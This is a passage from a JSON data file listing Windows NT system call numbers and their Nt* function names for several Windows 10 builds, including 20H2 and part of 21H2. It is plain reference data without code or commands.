"NtQueryDebugFilterState", "322": "NtQueryDirectoryFileEx", "323": "NtQueryDirectoryObject", "324": "NtQueryDriverEntryOrder", "325": "NtQueryEaFile", "326": "NtQueryFullAttributesFile", "327": "NtQueryInformationAtom", "328": "NtQueryInformationByName", "329": "NtQueryInformationEnlistment", "330": "NtQueryInformationJobObject", "331": "NtQueryInformationPort", "332": "NtQueryInformationResourceManager", "333": "NtQueryInformationTransaction", "334": "NtQueryInformationTransactionManager", "335": "NtQueryInformationWorkerFactory", "336": "NtQueryInstallUILanguage", "337": "NtQueryIntervalProfile", "338": "NtQueryIoCompletion", "339": "NtQueryLicenseValue", "340": "NtQueryMultipleValueKey", "341": "NtQueryMutant", "342": "NtQueryOpenSubKeys", "343": "NtQueryOpenSubKeysEx", "344": "NtQueryPortInformationProcess", "345": "NtQueryQuotaInformationFile", "346": "NtQuerySecurityAttributesToken", "347": "NtQuerySecurityObject", "348": "NtQuerySecurityPolicy", "349": "NtQuerySemaphore", "350": "NtQuerySymbolicLinkObject", "351": "NtQuerySystemEnvironmentValue", "352": "NtQuerySystemEnvironmentValueEx", "353": "NtQuerySystemInformationEx", "354": "NtQueryTimerResolution", "355": "NtQueryWnfStateData", "356": "NtQueryWnfStateNameInformation", "357": "NtQueueApcThreadEx", "358": "NtRaiseException", "359": "NtRaiseHardError", "360": "NtReadOnlyEnlistment", "361": "NtRecoverEnlistment", "362": "NtRecoverResourceManager", "363": "NtRecoverTransactionManager", "364": "NtRegisterProtocolAddressInformation", "365": "NtRegisterThreadTerminatePort", "366": "NtReleaseKeyedEvent", "367": "NtReleaseWorkerFactoryWorker", "368": "NtRemoveIoCompletionEx", "369": "NtRemoveProcessDebug", "370": "NtRenameKey", "371": "NtRenameTransactionManager", "372": "NtReplaceKey", "373": "NtReplacePartitionUnit", "374": "NtReplyWaitReplyPort", "375": "NtRequestPort", "376": "NtResetEvent", "377": "NtResetWriteWatch", "378": "NtRestoreKey", "379": "NtResumeProcess", "380": "NtRevertContainerImpersonation", "381": "NtRollbackComplete", "382": "NtRollbackEnlistment", "383": "NtRollbackRegistryTransaction", "384": "NtRollbackTransaction", "385": "NtRollforwardTransactionManager", "386": "NtSaveKey", "387": "NtSaveKeyEx", "388": "NtSaveMergedKeys", "389": "NtSecureConnectPort", "390": "NtSerializeBoot", "391": "NtSetBootEntryOrder", "392": "NtSetBootOptions", "393": "NtSetCachedSigningLevel", "394": "NtSetCachedSigningLevel2", "395": "NtSetContextThread", "396": "NtSetDebugFilterState", "397": "NtSetDefaultHardErrorPort", "398": "NtSetDefaultLocale", "399": "NtSetDefaultUILanguage", "400": "NtSetDriverEntryOrder", "401": "NtSetEaFile", "402": "NtSetHighEventPair", "403": "NtSetHighWaitLowEventPair", "404": "NtSetIRTimer", "405": "NtSetInformationDebugObject", "406": "NtSetInformationEnlistment", "407": "NtSetInformationJobObject", "408": "NtSetInformationKey", "409": "NtSetInformationResourceManager", "410": "NtSetInformationSymbolicLink", "411": "NtSetInformationToken", "412": "NtSetInformationTransaction", "413": "NtSetInformationTransactionManager", "414": "NtSetInformationVirtualMemory", "415": "NtSetInformationWorkerFactory", "416": "NtSetIntervalProfile", "417": "NtSetIoCompletion", "418": "NtSetIoCompletionEx", "419": "NtSetLdtEntries", "420": "NtSetLowEventPair", "421": "NtSetLowWaitHighEventPair", "422": "NtSetQuotaInformationFile", "423": "NtSetSecurityObject", "424": "NtSetSystemEnvironmentValue", "425": "NtSetSystemEnvironmentValueEx", "426": "NtSetSystemInformation", "427": "NtSetSystemPowerState", "428": "NtSetSystemTime", "429": "NtSetThreadExecutionState", "430": "NtSetTimer2", "431": "NtSetTimerEx", "432": "NtSetTimerResolution", "433": "NtSetUuidSeed", "434": "NtSetVolumeInformationFile", "435": "NtSetWnfProcessNotificationEvent", "436": "NtShutdownSystem", "437": "NtShutdownWorkerFactory", "438": "NtSignalAndWaitForSingleObject", "439": "NtSinglePhaseReject", "440": "NtStartProfile", "441": "NtStopProfile", "442": "NtSubscribeWnfStateChange", "443": "NtSuspendProcess", "444": "NtSuspendThread", "445": "NtSystemDebugControl", "446": "NtTerminateEnclave", "447": "NtTerminateJobObject", "448": "NtTestAlert", "449": "NtThawRegistry", "450": "NtThawTransactions", "451": "NtTraceControl", "452": "NtTranslateFilePath", "453": "NtUmsThreadYield", "454": "NtUnloadDriver", "455": "NtUnloadKey", "456": "NtUnloadKey2", "457": "NtUnloadKeyEx", "458": "NtUnlockFile", "459": "NtUnlockVirtualMemory", "460": "NtUnmapViewOfSectionEx", "461": "NtUnsubscribeWnfStateChange", "462": "NtUpdateWnfStateData", "463": "NtVdmControl", "464": "NtWaitForAlertByThreadId", "465": "NtWaitForDebugEvent", "466": "NtWaitForKeyedEvent", "467": "NtWaitForWorkViaWorkerFactory", "468": "NtWaitHighEventPair", "469": "NtWaitLowEventPair", "470": "NtLoadKey3"}, "20H2": {"0": "NtAccessCheck", "1": "NtWorkerFactoryWorkerReady", "2": "NtAcceptConnectPort", "3": "NtMapUserPhysicalPagesScatter", "4": "NtWaitForSingleObject", "5": "NtCallbackReturn", "6": "NtReadFile", "7": "NtDeviceIoControlFile", "8": "NtWriteFile", "9": "NtRemoveIoCompletion", "10": "NtReleaseSemaphore", "11": "NtReplyWaitReceivePort", "12": "NtReplyPort", "13": "NtSetInformationThread", "14": "NtSetEvent", "15": "NtClose", "16": "NtQueryObject", "17": "NtQueryInformationFile", "18": "NtOpenKey", "19": "NtEnumerateValueKey", "20": "NtFindAtom", "21": "NtQueryDefaultLocale", "22": "NtQueryKey", "23": "NtQueryValueKey", "24": "NtAllocateVirtualMemory", "25": "NtQueryInformationProcess", "26": "NtWaitForMultipleObjects32", "27": "NtWriteFileGather", "28": "NtSetInformationProcess", "29": "NtCreateKey", "30": "NtFreeVirtualMemory", "31": "NtImpersonateClientOfPort", "32": "NtReleaseMutant", "33": "NtQueryInformationToken", "34": "NtRequestWaitReplyPort", "35": "NtQueryVirtualMemory", "36": "NtOpenThreadToken", "37": "NtQueryInformationThread", "38": "NtOpenProcess", "39": "NtSetInformationFile", "40": "NtMapViewOfSection", "41": "NtAccessCheckAndAuditAlarm", "42": "NtUnmapViewOfSection", "43": "NtReplyWaitReceivePortEx", "44": "NtTerminateProcess", "45": "NtSetEventBoostPriority", "46": "NtReadFileScatter", "47": "NtOpenThreadTokenEx", "48": "NtOpenProcessTokenEx", "49": "NtQueryPerformanceCounter", "50": "NtEnumerateKey", "51": "NtOpenFile", "52": "NtDelayExecution", "53": "NtQueryDirectoryFile", "54": "NtQuerySystemInformation", "55": "NtOpenSection", "56": "NtQueryTimer", "57": "NtFsControlFile", "58": "NtWriteVirtualMemory", "59": "NtCloseObjectAuditAlarm", "60": "NtDuplicateObject", "61": "NtQueryAttributesFile", "62": "NtClearEvent", "63": "NtReadVirtualMemory", "64": "NtOpenEvent", "65": "NtAdjustPrivilegesToken", "66": "NtDuplicateToken", "67": "NtContinue", "68": "NtQueryDefaultUILanguage", "69": "NtQueueApcThread", "70": "NtYieldExecution", "71": "NtAddAtom", "72": "NtCreateEvent", "73": "NtQueryVolumeInformationFile", "74": "NtCreateSection", "75": "NtFlushBuffersFile", "76": "NtApphelpCacheControl", "77": "NtCreateProcessEx", "78": "NtCreateThread", "79": "NtIsProcessInJob", "80": "NtProtectVirtualMemory", "81": "NtQuerySection", "82": "NtResumeThread", "83": "NtTerminateThread", "84": "NtReadRequestData", "85": "NtCreateFile", "86": "NtQueryEvent", "87": "NtWriteRequestData", "88": "NtOpenDirectoryObject", "89": "NtAccessCheckByTypeAndAuditAlarm", "90": "NtQuerySystemTime", "91": "NtWaitForMultipleObjects", "92": "NtSetInformationObject", "93": "NtCancelIoFile", "94": "NtTraceEvent", "95": "NtPowerInformation", "96": "NtSetValueKey", "97": "NtCancelTimer", "98": "NtSetTimer", "99": "NtAccessCheckByType", "100": "NtAccessCheckByTypeResultList", "101": "NtAccessCheckByTypeResultListAndAuditAlarm", "102": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "103": "NtAcquireCrossVmMutant", "104": "NtAcquireProcessActivityReference", "105": "NtAddAtomEx", "106": "NtAddBootEntry", "107": "NtAddDriverEntry", "108": "NtAdjustGroupsToken", "109": "NtAdjustTokenClaimsAndDeviceGroups", "110": "NtAlertResumeThread", "111": "NtAlertThread", "112": "NtAlertThreadByThreadId", "113": "NtAllocateLocallyUniqueId", "114": "NtAllocateReserveObject", "115": "NtAllocateUserPhysicalPages", "116": "NtAllocateUserPhysicalPagesEx", "117": "NtAllocateUuids", "118": "NtAllocateVirtualMemoryEx", "119": "NtAlpcAcceptConnectPort", "120": "NtAlpcCancelMessage", "121": "NtAlpcConnectPort", "122": "NtAlpcConnectPortEx", "123": "NtAlpcCreatePort", "124": "NtAlpcCreatePortSection", "125": "NtAlpcCreateResourceReserve", "126": "NtAlpcCreateSectionView", "127": "NtAlpcCreateSecurityContext", "128": "NtAlpcDeletePortSection", "129": "NtAlpcDeleteResourceReserve", "130": "NtAlpcDeleteSectionView", "131": "NtAlpcDeleteSecurityContext", "132": "NtAlpcDisconnectPort", "133": "NtAlpcImpersonateClientContainerOfPort", "134": "NtAlpcImpersonateClientOfPort", "135": "NtAlpcOpenSenderProcess", "136": "NtAlpcOpenSenderThread", "137": "NtAlpcQueryInformation", "138": "NtAlpcQueryInformationMessage", "139": "NtAlpcRevokeSecurityContext", "140": "NtAlpcSendWaitReceivePort", "141": "NtAlpcSetInformation", "142": "NtAreMappedFilesTheSame", "143": "NtAssignProcessToJobObject", "144": "NtAssociateWaitCompletionPacket", "145": "NtCallEnclave", "146": "NtCancelIoFileEx", "147": "NtCancelSynchronousIoFile", "148": "NtCancelTimer2", "149": "NtCancelWaitCompletionPacket", "150": "NtCommitComplete", "151": "NtCommitEnlistment", "152": "NtCommitRegistryTransaction", "153": "NtCommitTransaction", "154": "NtCompactKeys", "155": "NtCompareObjects", "156": "NtCompareSigningLevels", "157": "NtCompareTokens", "158": "NtCompleteConnectPort", "159": "NtCompressKey", "160": "NtConnectPort", "161": "NtContinueEx", "162": "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter", "163": "NtCreateCrossVmEvent", "164": "NtCreateCrossVmMutant", "165": "NtCreateDebugObject", "166": "NtCreateDirectoryObject", "167": "NtCreateDirectoryObjectEx", "168": "NtCreateEnclave", "169": "NtCreateEnlistment", "170": "NtCreateEventPair", "171": "NtCreateIRTimer", "172": "NtCreateIoCompletion", "173": "NtCreateJobObject", "174": "NtCreateJobSet", "175": "NtCreateKeyTransacted", "176": "NtCreateKeyedEvent", "177": "NtCreateLowBoxToken", "178": "NtCreateMailslotFile", "179": "NtCreateMutant", "180": "NtCreateNamedPipeFile", "181": "NtCreatePagingFile", "182": "NtCreatePartition", "183": "NtCreatePort", "184": "NtCreatePrivateNamespace", "185": "NtCreateProcess", "186": "NtCreateProfile", "187": "NtCreateProfileEx", "188": "NtCreateRegistryTransaction", "189": "NtCreateResourceManager", "190": "NtCreateSectionEx", "191": "NtCreateSemaphore", "192": "NtCreateSymbolicLinkObject", "193": "NtCreateThreadEx", "194": "NtCreateTimer", "195": "NtCreateTimer2", "196": "NtCreateToken", "197": "NtCreateTokenEx", "198": "NtCreateTransaction", "199": "NtCreateTransactionManager", "200": "NtCreateUserProcess", "201": "NtCreateWaitCompletionPacket", "202": "NtCreateWaitablePort", "203": "NtCreateWnfStateName", "204": "NtCreateWorkerFactory", "205": "NtDebugActiveProcess", "206": "NtDebugContinue", "207": "NtDeleteAtom", "208": "NtDeleteBootEntry", "209": "NtDeleteDriverEntry", "210": "NtDeleteFile", "211": "NtDeleteKey", "212": "NtDeleteObjectAuditAlarm", "213": "NtDeletePrivateNamespace", "214": "NtDeleteValueKey", "215": "NtDeleteWnfStateData", "216": "NtDeleteWnfStateName", "217": "NtDirectGraphicsCall", "218": "NtDisableLastKnownGood", "219": "NtDisplayString", "220": "NtDrawText", "221": "NtEnableLastKnownGood", "222": "NtEnumerateBootEntries", "223": "NtEnumerateDriverEntries", "224": "NtEnumerateSystemEnvironmentValuesEx", "225": "NtEnumerateTransactionObject", "226": "NtExtendSection", "227": "NtFilterBootOption", "228": "NtFilterToken", "229": "NtFilterTokenEx", "230": "NtFlushBuffersFileEx", "231": "NtFlushInstallUILanguage", "232": "NtFlushInstructionCache", "233": "NtFlushKey", "234": "NtFlushProcessWriteBuffers", "235": "NtFlushVirtualMemory", "236": "NtFlushWriteBuffer", "237": "NtFreeUserPhysicalPages", "238": "NtFreezeRegistry", "239": "NtFreezeTransactions", "240": "NtGetCachedSigningLevel", "241": "NtGetCompleteWnfStateSubscription", "242": "NtGetContextThread", "243": "NtGetCurrentProcessorNumber", "244": "NtGetCurrentProcessorNumberEx", "245": "NtGetDevicePowerState", "246": "NtGetMUIRegistryInfo", "247": "NtGetNextProcess", "248": "NtGetNextThread", "249": "NtGetNlsSectionPtr", "250": "NtGetNotificationResourceManager", "251": "NtGetWriteWatch", "252": "NtImpersonateAnonymousToken", "253": "NtImpersonateThread", "254": "NtInitializeEnclave", "255": "NtInitializeNlsFiles", "256": "NtInitializeRegistry", "257": "NtInitiatePowerAction", "258": "NtIsSystemResumeAutomatic", "259": "NtIsUILanguageComitted", "260": "NtListenPort", "261": "NtLoadDriver", "262": "NtLoadEnclaveData", "263": "NtLoadKey", "264": "NtLoadKey2", "265": "NtLoadKeyEx", "266": "NtLockFile", "267": "NtLockProductActivationKeys", "268": "NtLockRegistryKey", "269": "NtLockVirtualMemory", "270": "NtMakePermanentObject", "271": "NtMakeTemporaryObject", "272": "NtManageHotPatch", "273": "NtManagePartition", "274": "NtMapCMFModule", "275": "NtMapUserPhysicalPages", "276": "NtMapViewOfSectionEx", "277": "NtModifyBootEntry", "278": "NtModifyDriverEntry", "279": "NtNotifyChangeDirectoryFile", "280": "NtNotifyChangeDirectoryFileEx", "281": "NtNotifyChangeKey", "282": "NtNotifyChangeMultipleKeys", "283": "NtNotifyChangeSession", "284": "NtOpenEnlistment", "285": "NtOpenEventPair", "286": "NtOpenIoCompletion", "287": "NtOpenJobObject", "288": "NtOpenKeyEx", "289": "NtOpenKeyTransacted", "290": "NtOpenKeyTransactedEx", "291": "NtOpenKeyedEvent", "292": "NtOpenMutant", "293": "NtOpenObjectAuditAlarm", "294": "NtOpenPartition", "295": "NtOpenPrivateNamespace", "296": "NtOpenProcessToken", "297": "NtOpenRegistryTransaction", "298": "NtOpenResourceManager", "299": "NtOpenSemaphore", "300": "NtOpenSession", "301": "NtOpenSymbolicLinkObject", "302": "NtOpenThread", "303": "NtOpenTimer", "304": "NtOpenTransaction", "305": "NtOpenTransactionManager", "306": "NtPlugPlayControl", "307": "NtPrePrepareComplete", "308": "NtPrePrepareEnlistment", "309": "NtPrepareComplete", "310": "NtPrepareEnlistment", "311": "NtPrivilegeCheck", "312": "NtPrivilegeObjectAuditAlarm", "313": "NtPrivilegedServiceAuditAlarm", "314": "NtPropagationComplete", "315": "NtPropagationFailed", "316": "NtPssCaptureVaSpaceBulk", "317": "NtPulseEvent", "318": "NtQueryAuxiliaryCounterFrequency", "319": "NtQueryBootEntryOrder", "320": "NtQueryBootOptions", "321": "NtQueryDebugFilterState", "322": "NtQueryDirectoryFileEx", "323": "NtQueryDirectoryObject", "324": "NtQueryDriverEntryOrder", "325": "NtQueryEaFile", "326": "NtQueryFullAttributesFile", "327": "NtQueryInformationAtom", "328": "NtQueryInformationByName", "329": "NtQueryInformationEnlistment", "330": "NtQueryInformationJobObject", "331": "NtQueryInformationPort", "332": "NtQueryInformationResourceManager", "333": "NtQueryInformationTransaction", "334": "NtQueryInformationTransactionManager", "335": "NtQueryInformationWorkerFactory", "336": "NtQueryInstallUILanguage", "337": "NtQueryIntervalProfile", "338": "NtQueryIoCompletion", "339": "NtQueryLicenseValue", "340": "NtQueryMultipleValueKey", "341": "NtQueryMutant", "342": "NtQueryOpenSubKeys", "343": "NtQueryOpenSubKeysEx", "344": "NtQueryPortInformationProcess", "345": "NtQueryQuotaInformationFile", "346": "NtQuerySecurityAttributesToken", "347": "NtQuerySecurityObject", "348": "NtQuerySecurityPolicy", "349": "NtQuerySemaphore", "350": "NtQuerySymbolicLinkObject", "351": "NtQuerySystemEnvironmentValue", "352": "NtQuerySystemEnvironmentValueEx", "353": "NtQuerySystemInformationEx", "354": "NtQueryTimerResolution", "355": "NtQueryWnfStateData", "356": "NtQueryWnfStateNameInformation", "357": "NtQueueApcThreadEx", "358": "NtRaiseException", "359": "NtRaiseHardError", "360": "NtReadOnlyEnlistment", "361": "NtRecoverEnlistment", "362": "NtRecoverResourceManager", "363": "NtRecoverTransactionManager", "364": "NtRegisterProtocolAddressInformation", "365": "NtRegisterThreadTerminatePort", "366": "NtReleaseKeyedEvent", "367": "NtReleaseWorkerFactoryWorker", "368": "NtRemoveIoCompletionEx", "369": "NtRemoveProcessDebug", "370": "NtRenameKey", "371": "NtRenameTransactionManager", "372": "NtReplaceKey", "373": "NtReplacePartitionUnit", "374": "NtReplyWaitReplyPort", "375": "NtRequestPort", "376": "NtResetEvent", "377": "NtResetWriteWatch", "378": "NtRestoreKey", "379": "NtResumeProcess", "380": "NtRevertContainerImpersonation", "381": "NtRollbackComplete", "382": "NtRollbackEnlistment", "383": "NtRollbackRegistryTransaction", "384": "NtRollbackTransaction", "385": "NtRollforwardTransactionManager", "386": "NtSaveKey", "387": "NtSaveKeyEx", "388": "NtSaveMergedKeys", "389": "NtSecureConnectPort", "390": "NtSerializeBoot", "391": "NtSetBootEntryOrder", "392": "NtSetBootOptions", "393": "NtSetCachedSigningLevel", "394": "NtSetCachedSigningLevel2", "395": "NtSetContextThread", "396": "NtSetDebugFilterState", "397": "NtSetDefaultHardErrorPort", "398": "NtSetDefaultLocale", "399": "NtSetDefaultUILanguage", "400": "NtSetDriverEntryOrder", "401": "NtSetEaFile", "402": "NtSetHighEventPair", "403": "NtSetHighWaitLowEventPair", "404": "NtSetIRTimer", "405": "NtSetInformationDebugObject", "406": "NtSetInformationEnlistment", "407": "NtSetInformationJobObject", "408": "NtSetInformationKey", "409": "NtSetInformationResourceManager", "410": "NtSetInformationSymbolicLink", "411": "NtSetInformationToken", "412": "NtSetInformationTransaction", "413": "NtSetInformationTransactionManager", "414": "NtSetInformationVirtualMemory", "415": "NtSetInformationWorkerFactory", "416": "NtSetIntervalProfile", "417": "NtSetIoCompletion", "418": "NtSetIoCompletionEx", "419": "NtSetLdtEntries", "420": "NtSetLowEventPair", "421": "NtSetLowWaitHighEventPair", "422": "NtSetQuotaInformationFile", "423": "NtSetSecurityObject", "424": "NtSetSystemEnvironmentValue", "425": "NtSetSystemEnvironmentValueEx", "426": "NtSetSystemInformation", "427": "NtSetSystemPowerState", "428": "NtSetSystemTime", "429": "NtSetThreadExecutionState", "430": "NtSetTimer2", "431": "NtSetTimerEx", "432": "NtSetTimerResolution", "433": "NtSetUuidSeed", "434": "NtSetVolumeInformationFile", "435": "NtSetWnfProcessNotificationEvent", "436": "NtShutdownSystem", "437": "NtShutdownWorkerFactory", "438": "NtSignalAndWaitForSingleObject", "439": "NtSinglePhaseReject", "440": "NtStartProfile", "441": "NtStopProfile", "442": "NtSubscribeWnfStateChange", "443": "NtSuspendProcess", "444": "NtSuspendThread", "445": "NtSystemDebugControl", "446": "NtTerminateEnclave", "447": "NtTerminateJobObject", "448": "NtTestAlert", "449": "NtThawRegistry", "450": "NtThawTransactions", "451": "NtTraceControl", "452": "NtTranslateFilePath", "453": "NtUmsThreadYield", "454": "NtUnloadDriver", "455": "NtUnloadKey", "456": "NtUnloadKey2", "457": "NtUnloadKeyEx", "458": "NtUnlockFile", "459": "NtUnlockVirtualMemory", "460": "NtUnmapViewOfSectionEx", "461": "NtUnsubscribeWnfStateChange", "462": "NtUpdateWnfStateData", "463": "NtVdmControl", "464": "NtWaitForAlertByThreadId", "465": "NtWaitForDebugEvent", "466": "NtWaitForKeyedEvent", "467": "NtWaitForWorkViaWorkerFactory", "468": "NtWaitHighEventPair", "469": "NtWaitLowEventPair", "470": "NtLoadKey3"}, "21H2":{"0": "NtAccessCheck", "41": "NtAccessCheckAndAuditAlarm", "99": "NtAccessCheckByType", "89": "NtAccessCheckByTypeAndAuditAlarm", "100": "NtAccessCheckByTypeResultList", "101": "NtAccessCheckByTypeResultListAndAuditAlarm", "102": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "103": "NtAcquireCrossVmMutant", "104": "NtAcquireProcessActivityReference", "655431": "NtAddAtom", "1114217": "NtAddAtomEx", "106": "NtAddBootEntry", "107": "NtAddDriverEntry", "108": "NtAdjustGroupsToken", "65": "NtAdjustPrivilegesToken", "109": "NtAdjustTokenClaimsAndDeviceGroups", "458862": "NtAlertResumeThread", "196719": "NtAlertThread", "262256": "NtAlertThreadByThreadId", "262257": "NtAllocateLocallyUniqueId", "114": "NtAllocateReserveObject", "115": "NtAllocateUserPhysicalPages", "116": "NtAllocateUserPhysicalPagesEx", "1114229": "NtAllocateUuids", "24": "NtAllocateVirtualMemory", "118": "NtAllocateVirtualMemoryEx", "119": "NtAlpcAcceptConnectPort", "120": "NtAlpcCancelMessage", "121": "NtAlpcConnectPort", "122": "NtAlpcConnectPortEx", "123": "NtAlpcCreatePort", "124": "NtAlpcCreatePortSection", "125": "NtAlpcCreateResourceReserve", "126": "NtAlpcCreateSectionView", "127": "NtAlpcCreateSecurityContext", "128": "NtAlpcDeletePortSection", "129": "NtAlpcDeleteResourceReserve", "130": "NtAlpcDeleteSectionView", "131": "NtAlpcDeleteSecurityContext", "132": "NtAlpcDisconnectPort", "133": "NtAlpcImpersonateClientContainerOfPort", "134": "NtAlpcImpersonateClientOfPort", "135": "NtAlpcOpenSenderProcess", "136": "NtAlpcOpenSenderThread", "137": "NtAlpcQueryInformation", "138": "NtAlpcQueryInformationMessage", "139": "NtAlpcRevokeSecurityContext", "140": "NtAlpcSendWaitReceivePort", "141": "NtAlpcSetInformation", "76": "NtApphelpCacheControl", "327822": "NtAreMappedFilesTheSame", "524431": "NtAssignProcessToJobObject", "144": "NtAssociateWaitCompletionPacket", "145": "NtCallEnclave", "5": "NtCallbackReturn", "93": "NtCancelIoFile", "146": "NtCancelIoFileEx", "147": "NtCancelSynchronousIoFile", "97": "NtCancelTimer", "148": "NtCancelTimer2", "149": "NtCancelWaitCompletionPacket", "196670": "NtClearEvent", "196623": "NtClose", "59": "NtCloseObjectAuditAlarm", "150": "NtCommitComplete", "151": "NtCommitEnlistment", "152": "NtCommitRegistryTransaction", "153": "NtCommitTransaction", "154": "NtCompactKeys", "155": "NtCompareObjects", "156": "NtCompareSigningLevels", "157": "NtCompareTokens", "158": "NtCompleteConnectPort", "196767": "NtCompressKey", "160": "NtConnectPort", "67": "NtContinue", "161": "NtContinueEx", "162": "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter", "163": "NtCreateCrossVmEvent", "164": "NtCreateCrossVmMutant", "165": "NtCreateDebugObject", "166": "NtCreateDirectoryObject", "167": "NtCreateDirectoryObjectEx", "168": "NtCreateEnclave", "169": "NtCreateEnlistment", "72": "NtCreateEvent", "170": "NtCreateEventPair", "85": "NtCreateFile", "171": "NtCreateIRTimer", "172": "NtCreateIoCompletion", "173": "NtCreateJobObject", "174": "NtCreateJobSet", "29": "NtCreateKey", "175": "NtCreateKeyTransacted", "176": "NtCreateKeyedEvent", "177": "NtCreateLowBoxToken", "178": "NtCreateMailslotFile", "179": "NtCreateMutant", "180": "NtCreateNamedPipeFile", "181": "NtCreatePagingFile", "182": "NtCreatePartition", "183": "NtCreatePort", "184": "NtCreatePrivateNamespace", "185": "NtCreateProcess", "77": "NtCreateProcessEx", "186": "NtCreateProfile", "187": "NtCreateProfileEx", "188": "NtCreateRegistryTransaction", "189": "NtCreateResourceManager", "74": "NtCreateSection", "190": "NtCreateSectionEx", "191": "NtCreateSemaphore", "192": "NtCreateSymbolicLinkObject", "78": "NtCreateThread", "193": "NtCreateThreadEx", "194": "NtCreateTimer", "195": "NtCreateTimer2", "196": "NtCreateToken", "197": "NtCreateTokenEx", "198": "NtCreateTransaction", "199": "NtCreateTransactionManager", "200": "NtCreateUserProcess", "201": "NtCreateWaitCompletionPacket", "202": "NtCreateWaitablePort", "203": "NtCreateWnfStateName", "204": "NtCreateWorkerFactory", "524493": "NtDebugActiveProcess", "206": "NtDebugContinue", "393268": "NtDelayExecution", "262351": "NtDeleteAtom", "208": "NtDeleteBootEntry", "209": "NtDeleteDriverEntry", "210": "NtDeleteFile", "211": "NtDeleteKey", "212": "NtDeleteObjectAuditAlarm", "213": "NtDeletePrivateNamespace", "214": "NtDeleteValueKey", "215": "NtDeleteWnfStateData", "216": "NtDeleteWnfStateName", "1769479": "NtDeviceIoControlFile", "217": "NtDirectGraphicsCall", "218": "NtDisableLastKnownGood", "219": "NtDisplayString", "220": "NtDrawText", "60": "NtDuplicateObject", "66": "NtDuplicateToken", "221": "NtEnableLastKnownGood", "222": "NtEnumerateBootEntries", "223": "NtEnumerateDriverEntries", "50": "NtEnumerateKey", "224": "NtEnumerateSystemEnvironmentValuesEx", "225": "NtEnumerateTransactionObject", "19": "NtEnumerateValueKey", "226": "NtExtendSection", "227": "NtFilterBootOption", "228": "NtFilterToken", "229": "NtFilterTokenEx", "655380": "NtFindAtom", "75": "NtFlushBuffersFile", "230": "NtFlushBuffersFileEx", "231": "NtFlushInstallUILanguage", "786664": "NtFlushInstructionCache", "196841": "NtFlushKey", "234": "NtFlushProcessWriteBuffers", "235": "NtFlushVirtualMemory", "65772": "NtFlushWriteBuffer", "237": "NtFreeUserPhysicalPages", "30": "NtFreeVirtualMemory", "238": "NtFreezeRegistry", "239": "NtFreezeTransactions", "1769529": "NtFsControlFile", "240": "NtGetCachedSigningLevel", "241": "NtGetCompleteWnfStateSubscription", "242": "NtGetContextThread", "1638643": "NtGetCurrentProcessorNumber", "244": "NtGetCurrentProcessorNumberEx", "458997": "NtGetDevicePowerState", "246": "NtGetMUIRegistryInfo", "247": "NtGetNextProcess", "248": "NtGetNextThread", "249": "NtGetNlsSectionPtr", "250": "NtGetNotificationResourceManager", "251": "NtGetWriteWatch", "196860": "NtImpersonateAnonymousToken", "458783": "NtImpersonateClientOfPort", "253": "NtImpersonateThread", "254": "NtInitializeEnclave", "255": "NtInitializeNlsFiles", "256": "NtInitializeRegistry", "1114369": "NtInitiatePowerAction", "524367": "NtIsProcessInJob", "65794": "NtIsSystemResumeAutomatic", "259": "NtIsUILanguageComitted", "260": "NtListenPort", "261": "NtLoadDriver", "262": "NtLoadEnclaveData", "263": "NtLoadKey", "264": "NtLoadKey2", "470": "NtLoadKey3", "265": "NtLoadKeyEx", "266": "NtLockFile", "327947": "NtLockProductActivationKeys", "196876": "NtLockRegistryKey", "269": "NtLockVirtualMemory", "196878": "NtMakePermanentObject", "196879": "NtMakeTemporaryObject", "272": "NtQueryObject", "273": "NtManagePartition", "274": "NtMapCMFModule", "655635": "NtMapUserPhysicalPages", "655363": "NtMapUserPhysicalPagesScatter", "40": "NtMapViewOfSection", "276": "NtMapViewOfSectionEx", "277": "NtModifyBootEntry", "278": "NtModifyDriverEntry", "279": "NtNotifyChangeDirectoryFile", "280": "NtNotifyChangeDirectoryFileEx", "281": "NtNotifyChangeKey", "282": "NtNotifyChangeMultipleKeys", "283": "NtNotifyChangeSession", "88": "NtOpenDirectoryObject", "284": "NtOpenEnlistment", "64": "NtOpenEvent", "285": "NtOpenEventPair", "51": "NtOpenFile", "286": "NtOpenIoCompletion", "287": "NtOpenJobObject", "18": "NtOpenKey", "288": "NtOpenKeyEx", "289": "NtOpenKeyTransacted", "290": "NtOpenKeyTransactedEx", "291": "NtOpenKeyedEvent", "292": "NtOpenMutant", "293": "NtOpenObjectAuditAlarm", "294": "NtOpenPartition", "295": "NtOpenPrivateNamespace", "38": "NtOpenProcess", "296": "NtOpenProcessToken", "48": "NtOpenProcessTokenEx", "297": "NtOpenRegistryTransaction", "298": "NtOpenResourceManager", "55": "NtOpenSection", "299": "NtOpenSemaphore", "300": "NtOpenSession", "301": "NtOpenSymbolicLinkObject", "302": "NtOpenThread", "36": "NtOpenThreadToken", "47": "NtOpenThreadTokenEx", "303": "NtOpenTimer", "304": "NtOpenTransaction", "305": "NtOpenTransactionManager", "306": "NtPlugPlayControl", "95": "NtPowerInformation", "307": "NtPrePrepareComplete", "308": "NtPrePrepareEnlistment", "309": "NtPrepareComplete", "310": "NtPrepareEnlistment", "786743": "NtPrivilegeCheck", "312": "NtPrivilegeObjectAuditAlarm", "313": "NtPrivilegedServiceAuditAlarm", "314": "NtPropagationComplete", "315": "NtPropagationFailed", "80": "NtProtectVirtualMemory", "316": "NtPssCaptureVaSpaceBulk", "459069": "NtPulseEvent", "61": "NtQueryAttributesFile", "318": "NtQueryAuxiliaryCounterFrequency", "319": "NtQueryBootEntryOrder", "320": "NtQueryBootOptions", "328001": "NtQueryDebugFilterState", "327701": "NtQueryDefaultLocale", "262212": "NtQueryDefaultUILanguage", "53": "NtQueryDirectoryFile", "322": "NtQueryDirectoryFileEx", "323": "NtQueryDirectoryObject", "324": "NtQueryDriverEntryOrder", "325": "NtQueryEaFile", "86": "NtQueryEvent", "326": "NtQueryFullAttributesFile", "327": "NtQueryInformationAtom", "328": "NtQueryInformationByName", "329": "NtQueryInformationEnlistment", "17": "NtQueryInformationFile", "330": "NtQueryInformationJobObject", "331": "NtQueryInformationPort", "25": "NtQueryInformationProcess", "332": "NtQueryInformationResourceManager", "37": "NtQueryInformationThread", "33": "NtQueryInformationToken", "333": "NtQueryInformationTransaction", "334": "NtQueryInformationTransactionManager", "335": "NtQueryInformationWorkerFactory", "262480": "NtQueryInstallUILanguage", "328017": "NtQueryIntervalProfile", "338": 